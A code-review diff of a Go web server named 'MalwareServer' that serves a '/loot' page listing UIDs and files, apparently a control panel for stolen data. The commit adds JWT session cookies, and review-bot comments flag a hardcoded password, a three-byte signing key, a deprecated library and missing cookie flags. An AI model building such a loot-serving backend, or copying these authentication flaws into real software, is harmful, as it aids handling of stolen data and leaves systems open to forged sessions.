Auth
		
							
								
								
									
										5
									
								
								go.mod
									
									
									
									
									
								
							
							
						
						
									
										5
									
								
								go.mod
									
									
									
									
									
								
							@@ -2,4 +2,7 @@ module MalwareServer
 | 
				
			|||||||
 | 
					
 | 
				
			||||||
go 1.22.2
 | 
					go 1.22.2
 | 
				
			||||||
 | 
					
 | 
				
			||||||
require github.com/liamg/magic v0.0.1 // indirect
 | 
					require (
 | 
				
			||||||
 | 
						github.com/dgrijalva/jwt-go v3.2.0+incompatible // indirect
 | 
				
			||||||
 | 
						github.com/liamg/magic v0.0.1 // indirect
 | 
				
			||||||
 | 
					)
 | 
				
			||||||
 
 | 
				
			|||||||
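Review bot: The new require block pins `github.com/dgrijalva/jwt-go v3.2.0+incompatible`, a module whose repository is archived and which no longer receives security fixes; the maintained continuation is `github.com/golang-jwt/jwt`, and new authentication code should start from it rather than from the frozen v3 line. The entry is also marked `// indirect` although the server code in this commit imports the package directly, so running `go mod tidy` would correct the marker. Whether `github.com/liamg/magic` is imported directly as well is not visible here and is worth checking at the same time.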
							
								
								
									
										2
									
								
								go.sum
									
									
									
									
									
								
							
							
						
						
									
										2
									
								
								go.sum
									
									
									
									
									
								
							@@ -1,2 +1,4 @@
 | 
				
			|||||||
 | 
					github.com/dgrijalva/jwt-go v3.2.0+incompatible h1:7qlOGliEKZXTDg6OTjfoBKDXWrumCAMpl/TFQ4/5kLM=
 | 
				
			||||||
 | 
					github.com/dgrijalva/jwt-go v3.2.0+incompatible/go.mod h1:E3ru+11k8xSBh+hMPgOLZmtrrCbhqsmaPHjLKYnJCaQ=
 | 
				
			||||||
github.com/liamg/magic v0.0.1 h1:Ru22ElY+sCh6RvRTWjQzKKCxsEco8hE0co8n1qe7TBM=
 | 
					github.com/liamg/magic v0.0.1 h1:Ru22ElY+sCh6RvRTWjQzKKCxsEco8hE0co8n1qe7TBM=
 | 
				
			||||||
github.com/liamg/magic v0.0.1/go.mod h1:yQkOmZZI52EA+SQ2xyHpVw8fNvTBruF873Y+Vt6S+fk=
 | 
					github.com/liamg/magic v0.0.1/go.mod h1:yQkOmZZI52EA+SQ2xyHpVw8fNvTBruF873Y+Vt6S+fk=
 | 
				
			||||||
 
 | 
				
			|||||||
@@ -8,19 +8,27 @@ import (
 | 
				
			|||||||
	"net/http"
 | 
						"net/http"
 | 
				
			||||||
	"path/filepath"
 | 
						"path/filepath"
 | 
				
			||||||
	"strings"
 | 
						"strings"
 | 
				
			||||||
 | 
						"time"
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
						"github.com/dgrijalva/jwt-go"
 | 
				
			||||||
)
 | 
					)
 | 
				
			||||||
 | 
					
 | 
				
			||||||
var (
 | 
					var (
 | 
				
			||||||
	password          = "hardcodedpassword"
 | 
						password          = "hardcodedpassword"
 | 
				
			||||||
	lootPath          = "Loot"
 | 
						lootPath          = "Loot"
 | 
				
			||||||
	sessionCookieName = "auth_session"
 | 
						sessionCookieName = "auth_session"
 | 
				
			||||||
)
 | 
						secretKey         = []byte("key"))
 | 
				
			||||||
 | 
					
 | 
				
			||||||
type PageData struct {
 | 
					type PageData struct {
 | 
				
			||||||
	UIDs  []string
 | 
						UIDs  []string
 | 
				
			||||||
	Files []string
 | 
						Files []string
 | 
				
			||||||
}
 | 
					}
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
					type Claims struct {
 | 
				
			||||||
 | 
						Username string `json:"username"`
 | 
				
			||||||
 | 
						jwt.StandardClaims
 | 
				
			||||||
 | 
					}
 | 
				
			||||||
 | 
					
 | 
				
			||||||
func main() {
 | 
					func main() {
 | 
				
			||||||
	http.HandleFunc("/", logMiddleware(loginHandler))
 | 
						http.HandleFunc("/", logMiddleware(loginHandler))
 | 
				
			||||||
	http.HandleFunc("/loot", logMiddleware(lootHandler))
 | 
						http.HandleFunc("/loot", logMiddleware(lootHandler))
 | 
				
			||||||
@@ -45,12 +53,28 @@ func loginHandler(w http.ResponseWriter, r *http.Request) {
 | 
				
			|||||||
	}
 | 
						}
 | 
				
			||||||
 | 
					
 | 
				
			||||||
	if r.FormValue("password") == password {
 | 
						if r.FormValue("password") == password {
 | 
				
			||||||
 | 
							expirationTime := time.Now().Add(1 * time.Hour)
 | 
				
			||||||
 | 
							claims := &Claims{
 | 
				
			||||||
 | 
								Username: "root",
 | 
				
			||||||
 | 
								StandardClaims: jwt.StandardClaims{
 | 
				
			||||||
 | 
									ExpiresAt: expirationTime.Unix(),
 | 
				
			||||||
 | 
								},
 | 
				
			||||||
 | 
							}
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
							token := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)
 | 
				
			||||||
 | 
							tokenString, err := token.SignedString(secretKey)
 | 
				
			||||||
 | 
							if err != nil {
 | 
				
			||||||
 | 
								http.Error(w, err.Error(), http.StatusInternalServerError)
 | 
				
			||||||
 | 
								return
 | 
				
			||||||
 | 
							}
 | 
				
			||||||
 | 
					
 | 
				
			||||||
		http.SetCookie(w, &http.Cookie{
 | 
							http.SetCookie(w, &http.Cookie{
 | 
				
			||||||
			Name:    sessionCookieName,
 | 
								Name:    sessionCookieName,
 | 
				
			||||||
			Value:  "authenticated",
 | 
								Value:   tokenString,
 | 
				
			||||||
 | 
								Expires: expirationTime,
 | 
				
			||||||
			Path:    "/",
 | 
								Path:    "/",
 | 
				
			||||||
			MaxAge: 3600,
 | 
					 | 
				
			||||||
		})
 | 
							})
 | 
				
			||||||
 | 
					
 | 
				
			||||||
		http.Redirect(w, r, "/loot", http.StatusSeeOther)
 | 
							http.Redirect(w, r, "/loot", http.StatusSeeOther)
 | 
				
			||||||
		return
 | 
							return
 | 
				
			||||||
	}
 | 
						}
 | 
				
			||||||
@@ -100,9 +124,19 @@ func renderTemplate(w http.ResponseWriter, tmpl string, data interface{}) {
 | 
				
			|||||||
 | 
					
 | 
				
			||||||
func isAuthenticated(r *http.Request) bool {
 | 
					func isAuthenticated(r *http.Request) bool {
 | 
				
			||||||
	sessionCookie, err := r.Cookie(sessionCookieName)
 | 
						sessionCookie, err := r.Cookie(sessionCookieName)
 | 
				
			||||||
	if err != nil || sessionCookie.Value != "authenticated" {
 | 
						if err != nil {
 | 
				
			||||||
		return false
 | 
							return false
 | 
				
			||||||
	}
 | 
						}
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
						tokenString := sessionCookie.Value
 | 
				
			||||||
 | 
						token, err := jwt.ParseWithClaims(tokenString, &Claims{}, func(token *jwt.Token) (interface{}, error) {
 | 
				
			||||||
 | 
							return secretKey, nil
 | 
				
			||||||
 | 
						})
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
						if err != nil || !token.Valid {
 | 
				
			||||||
 | 
							return false
 | 
				
			||||||
 | 
						}
 | 
				
			||||||
 | 
					
 | 
				
			||||||
	return true
 | 
						return true
 | 
				
			||||||
}
 | 
					}
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 
 | 
				
			|||||||
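Review bot: The signing key added to the var block, `secretKey = []byte("key")`, is a three-byte constant committed to the repository, so the HS256 signature on the session cookie adds no real protection: anyone who can read the source or guess the key can produce a token that isAuthenticated accepts. The key should come from configuration kept outside the repository, or be generated at startup as at least 32 bytes from crypto/rand, with the server refusing to start when no key is available. The keyfunc in isAuthenticated should also pin the algorithm before returning the key, for example `if _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok { return nil, jwt.ErrSignatureInvalid }`. The cookie set in loginHandler now carries the bearer token but sets none of `HttpOnly: true`, `Secure: true` or `SameSite: http.SameSiteStrictMode`, and `http.Error(w, err.Error(), ...)` on the signing failure returns the internal error text to the client. loginHandler and main both continue outside the visible hunks.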